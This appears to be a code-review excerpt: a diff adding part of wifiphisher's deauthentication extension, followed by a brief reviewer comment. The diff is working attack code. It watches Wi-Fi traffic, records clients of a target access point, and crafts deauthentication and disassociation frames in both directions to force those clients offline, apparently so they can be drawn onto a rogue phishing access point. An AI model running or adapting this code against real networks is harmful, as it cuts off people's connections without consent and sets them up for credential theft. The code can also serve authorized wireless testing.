wifiphisher/extensions/deauth.py

```diff
@@ -0,0 +1,137 @@
+                  / dot11.Dot11Disas())  
+
+        return [disassoc_packet, deauth_packet]
+
+    def get_packet(self, packet):
+        """
+        Process the Dot11 packets and add any desired clients to observed_clients.
+
+        :param self: A Deauthentication object.
+        :param packet: A scapy.layers.RadioTap object.
+        :type self: Deauthentication
+        :type packet: scapy.layers.RadioTap
+        :return: list with the crafted Deauth/Disas packets
+        :rtype: list
+        .. note: addr1 = Destination address
+                 addr2 = Sender address
+                 Also this finds devices that are not associated with any
+                 access point as they respond to the access point probes.
+        """
+
+        deauth_pkts = []
+
+        # check if the packet has a dot11 layer
+        if packet.haslayer(dot11.Dot11):
+            # get the sender and receiver
+            receiver = packet.addr1
+            sender = packet.addr2
+
+            # create a list of addresses that are not acceptable
+            non_valid_list = self._non_client_addresses + self._observed_clients
+
+            # if sender or receirver is valid and not already a
+            # discovered client check to see if either one is a client
+            if receiver not in non_valid_list and sender not in non_valid_list:
+                # in case the receiver is the access point
+                if receiver == self._data.target_ap_bssid:
+                    # add the sender to the client list
+                    self._observed_clients.append(sender)
+
+                    # create and add deauthentication packets for client
+                    deauth_pkts += self._craft_packet(sender, self._data.target_ap_bssid)
+                    deauth_pkts += self._craft_packet(self._data.target_ap_bssid, sender)
+
+                # in case the sender is the access point
+                elif sender == self._data.target_ap_bssid:
+                    # add the receiver to the client list
+                    self._observed_clients.append(receiver)
+
+                    # create and add deauthentication packets for client
+                    deauth_pkts += self._craft_packet(receiver, self._data.target_ap_bssid)
+                    deauth_pkts += self._craft_packet(self._data.target_ap_bssid, receiver)
+
+        return deauth_pkts
+
+    def send_output(self):
+        """
+        Get all the observed clients.
+
+        :param self: A Deauthentication object.
+        :type self: Deauthentication
+        :return: A list with all the Deauth/Disas entries.
+        :rtype: list
+        """
+
+        return ["DEAUTH/DISAS - " + c for c in self._observed_clients]
+
+    def on_exit(self):
+        """
+        Stop deauthing on exit.
+
+        :param self: A Deauthentication object
+        :return: None
+        :rtype: None
+        """
+
+        self._should_continue = False
```

Comment:
When that issue arises we can implement it then but it should be removed for now.